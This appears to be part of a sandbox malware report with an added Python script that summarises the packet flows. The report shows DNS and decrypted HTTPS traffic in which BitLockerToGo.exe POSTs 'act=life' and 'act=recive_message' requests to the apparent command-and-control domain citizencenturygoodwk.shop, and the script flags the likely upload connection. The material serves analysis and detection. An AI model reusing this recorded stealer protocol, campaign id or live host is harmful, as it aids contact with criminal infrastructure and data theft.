Jul 5, 2024 06:03:12.828030109 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.828372955 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.828387022 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:13.328937054 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:13.329030991 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:13.330425024 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:13.330440044 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:13.330677032 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:13.331938982 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:13.332107067 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:13.332142115 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:13.332207918 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:13.332215071 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:13.769699097 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:13.769808054 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:13.769941092 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:13.775295973 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:13.775321007 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:14.118318081 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:14.118351936 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:14.118447065 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:14.118897915 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:14.118907928 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:14.619733095 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:14.619805098 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:14.621114016 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:14.621119022 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:14.621373892 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:14.622585058 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:14.622740030 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:14.622767925 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:14.622829914 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:14.622847080 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:15.454097986 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:15.454205036 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:15.454296112 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:15.454576015 CEST | 49715 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:15.454597950 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:15.933123112 CEST | 49717 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:15.933162928 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:15.933255911 CEST | 49717 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:15.933679104 CEST | 49717 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:15.933691978 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:16.406003952 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:16.406095982 CEST | 49717 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:16.407357931 CEST | 49717 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:16.407368898 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:16.407614946 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:16.408914089 CEST | 49717 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:16.409020901 CEST | 49717 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:16.409060001 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:16.795792103 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:16.795896053 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:16.795959949 CEST | 49717 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:16.796284914 CEST | 49717 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:16.796303034 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:16.942167044 CEST | 49720 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:16.942212105 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:16.942289114 CEST | 49720 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:16.942743063 CEST | 49720 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:16.942760944 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:17.416043997 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:17.416110992 CEST | 49720 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:17.417448997 CEST | 49720 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:17.417455912 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:17.417735100 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:17.419117928 CEST | 49720 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:17.419254065 CEST | 49720 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:17.419260025 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:17.797710896 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:17.797816038 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:17.797946930 CEST | 49720 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:17.798187017 CEST | 49720 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:17.798202038 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.467570066 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.467607975 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.467700958 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.468292952 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.468303919 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.953274965 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.953368902 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.955065966 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.955080986 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.955323935 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.964915991 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.965862989 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.965884924 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.966070890 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966114044 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.966211081 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966274023 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.966371059 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966392994 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.966500998 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966531038 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.966645956 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966662884 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.966674089 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966691971 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.966794968 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966831923 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.977386951 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.977526903 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.977557898 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.977581024 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.977596045 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.977617025 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.977663994 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.977689981 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.977714062 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.977749109 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:21.316454887 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:21.316566944 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:21.316679955 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:21.316797972 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:21.316812992 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:21.325655937 CEST | 49723 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:21.325695038 CEST | 443 | 49723 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:21.325813055 CEST | 49723 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:21.326219082 CEST | 49723 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:21.326236010 CEST | 443 | 49723 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:21.685795069 CEST | 49723 | 443 | 192.168.2.6 | 188.114.96.3
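Reading the packet table above: the server closes every exchange (the decrypted HTTP stream later on this page shows Connection: close in its reply), so the client opens a fresh TLS connection to 188.114.96.3:443 for each request, nine of them on ascending source ports 49711 through 49723 within about twelve seconds. Most connections are a handful of packets in under a second; connection 49722 is the exception, with a run of ten client-to-server packets inside two milliseconds at 06:03:18.96, the natural place to look for the upload of collected data. The script below is an added example, not Joe Sandbox code, that folds rows in this layout into per-connection statistics and flags the connection whose client-side packet count stands out. SAMPLE_ROWS is an abridged excerpt of three of the nine connections, not the full table, and the threshold in bulk_upload_candidates is an assumed heuristic.

```python
"""Summarise a flattened TCP packet list into per-connection statistics.

Added example, not Joe Sandbox code. SAMPLE_ROWS is an abridged excerpt of the
report's packet table (three of the nine connections, a subset of their
packets), laid out as "timestamp | src port | dst port | src ip | dst ip".
"""
import re
from collections import defaultdict

SAMPLE_ROWS = """\
Jul 5, 2024 06:03:09.722399950 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06: 03:09.722450018 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:09.725661039 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.212552071 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.263241053 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.641165018 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.642899990 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.642905951 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.761686087 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.761718035 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.264345884 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.268119097 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.715369940 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.715796947 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.467570066 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.467607975 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.953274965 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:18.964915991 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.965862989 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966070890 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966211081 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966371059 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966500998 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966645956 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966674089 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966794968 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:18.966831923 CEST | 49722 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:21.316454887 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:21.316812992 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.6
"""

TIME_OF_DAY = re.compile(r"(\d\d):\s*(\d\d):(\d\d\.\d+)")


def to_seconds(ts: str) -> float:
    """Seconds since midnight; every row falls on one day so the date is dropped."""
    h, m, s = TIME_OF_DAY.search(ts).groups()
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_rows(text: str):
    """Parse pipe-separated rows into (seconds, sport, dport, sip, dip) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.lower().startswith("timestamp"):
            continue  # blank line or a pasted header row
        ts, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
        rows.append((to_seconds(ts), int(sport), int(dport), sip, dip))
    return rows


def sessions(rows, client_ip: str):
    """Fold packets into client-initiated connections keyed by
    (client port, server ip, server port), counting packets per direction."""
    conns = defaultdict(lambda: {"start": None, "end": None, "c2s": 0, "s2c": 0})
    for t, sport, dport, sip, dip in rows:
        if sip == client_ip:
            key, direction = (sport, dip, dport), "c2s"
        else:
            key, direction = (dport, sip, sport), "s2c"
        c = conns[key]
        c["start"] = t if c["start"] is None else min(c["start"], t)
        c["end"] = t if c["end"] is None else max(c["end"], t)
        c[direction] += 1
    return dict(conns)


def bulk_upload_candidates(conns, factor: float = 2.0):
    """Connections whose client->server packet count is at least `factor`
    times the median (assumed heuristic). In a run of short request/response
    exchanges, the one long client burst is where a large body went out."""
    counts = sorted(c["c2s"] for c in conns.values())
    median = counts[len(counts) // 2]
    return sorted(k for k, c in conns.items()
                  if c["c2s"] > median and c["c2s"] >= factor * median)


def connections_per_server(conns):
    """How many separate connections each server endpoint received."""
    per = defaultdict(int)
    for (_, ip, port) in conns:
        per[(ip, port)] += 1
    return dict(per)


if __name__ == "__main__":
    conns = sessions(parse_rows(SAMPLE_ROWS), "192.168.2.6")
    for key, c in sorted(conns.items(), key=lambda kv: kv[1]["start"]):
        print(key, f"{c['end'] - c['start']:.3f}s", "c2s", c["c2s"], "s2c", c["s2c"])
    print("bulk upload candidates:", bulk_upload_candidates(conns))
    print("connections per server:", connections_per_server(conns))
```

On the excerpt this reports three connections to 188.114.96.3:443, flags 49722 (11 client packets against a median of 4), and shows 49711 lasting about 0.92 s. Run it over the full table, or over a Zeek conn.log converted to the same five columns, to get the same picture on live data.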
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 5, 2024 06:03:09.701284885 CEST | 51716 | 53 | 192.168.2.6 | 1.1.1.1
Jul 5, 2024 06:03:09.716104031 CEST | 53 | 51716 | 1.1.1.1 | 192.168.2.6
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 5, 2024 06:03:09.701284885 CEST192.168.2.61.1.1.10x187cStandard query (0)citizencenturygoodwk.shopA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 5, 2024 06:03:09.716104031 CEST1.1.1.1192.168.2.60x187cNo error (0)citizencenturygoodwk.shop188.114.96.3A (IP address)IN (0x0001)false
              Jul 5, 2024 06:03:09.716104031 CEST1.1.1.1192.168.2.60x187cNo error (0)citizencenturygoodwk.shop188.114.97.3A (IP address)IN (0x0001)false
              • citizencenturygoodwk.shop
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.6 | 49711 | 188.114.96.3 | 443 | 3800 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-05 04:03:10 UTC | 272 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 8
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:10 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
              Data Ascii: act=life
              2024-07-05 04:03:10 UTC | 808 | IN | HTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:10 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=kc38s57cvhottn5qhuvhogkf3o; expires=Mon, 28-Oct-2024 21:49:49 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJRSN7C9JDqBdpogjYwJpTjkqPpvOOmIM4PnkqV2oyg06NVD22AXrAA%2FkmWTgJu%2By3ym5RmBvMQCoScgGj5i65kZGr1dOJz9EnO5SgHh6cISFDL4%2FGFr9kvOr0aP33bfJs8QpXNmGmjOnhlO"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476b57d854216-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:10 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
              Data Ascii: 2ok
              2024-07-05 04:03:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              1 | 192.168.2.6 | 49712 | 188.114.96.3 | 443 | 3800 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-05 04:03:11 UTC | 273 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 51
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:11 UTC | 51 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59 41 4c 55 56 26 6a 3d
              Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@SEFYALUV&j=
              2024-07-05 04:03:11 UTC | 814 | IN | HTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:11 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=8jgratetiibfvnug6a51r18op6; expires=Mon, 28-Oct-2024 21:49:50 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMVElCAdPX41RU2jzA1QQoj2z4SqG2%2BJfWkCj%2FeDvhLLWmjepNdFX%2Fap1HmcNafwxAVd4%2FlfxK%2BwSJ9fszm9M5tfHb12i0tOGE2ZrLA5psCED%2FHAJbbDeXmJGOTFya113ImwFHjJo47JlE3V"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476bb0e6c1a17-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:11 UTC | 555 | IN | Data Raw: 31 36 34 61 0d 0a 6f 56 58 51 49 43 6d 38 44 4a 2f 2b 51 59 69 41 58 61 76 2f 74 4b 4a 78 41 32 30 57 37 69 56 35 2f 72 51 56 59 78 4f 4c 2f 66 4c 61 58 39 6b 43 58 35 34 32 76 38 70 74 67 6f 6c 2f 32 4a 71 57 6d 46 46 33 48 32 4f 4c 43 58 50 33 6c 6e 51 48 4d 62 48 64 6c 4d 41 35 6f 30 55 46 74 67 57 39 6d 7a 6d 71 75 6e 33 77 39 62 32 72 43 69 4e 50 63 34 41 48 51 39 36 57 63 41 6c 78 36 70 47 51 77 44 36 2f 55 45 58 66 5a 50 4f 5a 4b 65 33 6a 4f 63 71 54 32 63 63 55 5a 67 78 38 67 45 77 55 6c 74 6b 33 54 7a 4f 70 6d 49 69 44 62 2f 41 43 5a 4e 6c 34 2f 72 4d 67 2b 2b 74 2f 69 34 4b 59 71 48 67 4b 46 6a 62 4d 51 42 66 63 6a 6a 56 42 63 75 36 66 6e 73 63 78 75 30 68 42 31 47 6a 38 6d 69 76 34 36 54 76 44 6c 39 62 47 47 47 77 48 5a 6f 4a 44 45 35 44 58 65
              Data Ascii: 164aoVXQICm8DJ/+QYiAXav/tKJxA20W7iV5/rQVYxOL/fLaX9kCX542v8ptgol/2JqWmFF3H2OLCXP3lnQHMbHdlMA5o0UFtgW9mzmqun3w9b2rCiNPc4AHQ96WcAlx6pGQwD6/UEXfZPOZKe3jOcqT2ccUZgx8gEwUltk3TzOpmIiDb/ACZNl4/rMg++t/i4KYqHgKFjbMQBfcjjVBcu6fnscxu0hB1Gj8miv46TvDl9bGGGwHZoJDE5DXe
              2024-07-05 04:03:11 UTC | 1369 | IN | Data Raw: 7a 48 75 6b 39 43 62 64 66 4a 47 53 74 70 76 2b 5a 49 74 37 75 34 35 78 35 44 5a 78 68 6c 68 43 48 36 45 54 78 71 52 33 58 67 42 64 4f 53 62 6c 73 38 32 74 77 49 46 6e 43 37 36 68 47 4f 79 6f 48 2f 6e 6d 74 58 53 55 56 51 4d 65 6f 4a 41 44 64 79 55 61 45 38 5a 67 76 53 4a 67 58 65 31 54 67 75 47 4c 4c 32 53 4a 75 58 77 50 74 75 59 32 4e 49 66 5a 41 6c 35 6a 30 6b 62 6d 64 46 36 44 33 66 75 6e 4a 6a 48 4e 72 78 4f 51 64 31 71 2f 74 78 74 71 4b 49 34 30 64 32 4f 67 6c 4e 51 44 48 43 4c 56 52 69 53 6c 6a 55 65 50 34 48 30 2b 39 70 31 38 6b 56 48 6e 6a 61 2f 33 43 6e 73 37 7a 62 43 6d 74 37 4d 41 57 6f 41 64 34 56 41 48 5a 62 56 66 77 74 33 35 35 36 58 78 6a 43 67 54 45 44 54 62 66 65 61 59 36 53 67 66 38 36 46 6c 70 68 52 49 53 46 33 6e 56 45 70 6e 38 64 6d
              Data Ascii: zHuk9CbdfJGStpv+ZIt7u45x5DZxhlhCH6ETxqR3XgBdOSbls82twIFnC76hGOyoH/nmtXSUVQMeoJADdyUaE8ZgvSJgXe1TguGLL2SJuXwPtuY2NIfZAl5j0kbmdF6D3funJjHNrxOQd1q/txtqKI40d2OglNQDHCLVRiSljUeP4H0+9p18kVHnja/3Cns7zbCmt7MAWoAd4VAHZbVfwt3556XxjCgTEDTbfeaY6Sgf86FlphRISF3nVEpn8dm
              2024-07-05 04:03:11 UTC | 1369 | IN | Data Raw: 4f 64 7a 48 57 48 51 55 58 51 61 65 76 63 59 66 57 73 56 36 4c 32 7a 34 4a 54 5a 67 4d 30 31 41 56 62 6b 4e 39 33 43 6e 76 74 6e 35 66 4f 4d 72 46 46 53 4e 4e 70 39 35 49 6b 37 75 34 32 78 4a 76 57 78 78 64 6b 48 58 47 46 53 78 66 63 6d 44 56 42 64 76 48 66 79 49 46 33 6e 55 56 64 33 55 48 2b 6a 53 71 71 6f 43 43 48 39 62 32 72 43 69 4e 50 63 34 41 48 51 39 36 57 63 41 52 35 34 70 6d 59 77 79 57 33 54 45 44 66 5a 50 75 64 4c 75 62 6b 50 38 69 64 30 4d 77 54 5a 67 68 6d 6e 6b 49 64 6a 74 77 33 54 7a 4f 70 6d 49 69 44 62 2f 41 43 66 63 35 35 37 49 70 68 33 2b 45 78 78 35 72 41 67 46 46 2b 51 52 7a 6e 4c 41 4c 65 6c 6e 41 4e 4d 62 48 64 30 4d 67 33 76 6b 56 44 32 47 72 31 6b 79 7a 6a 38 44 37 46 6b 38 54 48 45 32 67 42 65 34 42 4f 46 70 76 62 66 41 74 38 37
              Data Ascii: OdzHWHQUXQaevcYfWsV6L2z4JTZgM01AVbkN93Cnvtn5fOMrFFSNNp95Ik7u42xJvWxxdkHXGFSxfcmDVBdvHfyIF3nUVd3UH+jSqqoCCH9b2rCiNPc4AHQ96WcAR54pmYwyW3TEDfZPudLubkP8id0MwTZghmnkIdjtw3TzOpmIiDb/ACfc557Iph3+Exx5rAgFF+QRznLALelnANMbHd0Mg3vkVD2Gr1kyzj8D7Fk8THE2gBe4BOFpvbfAt87
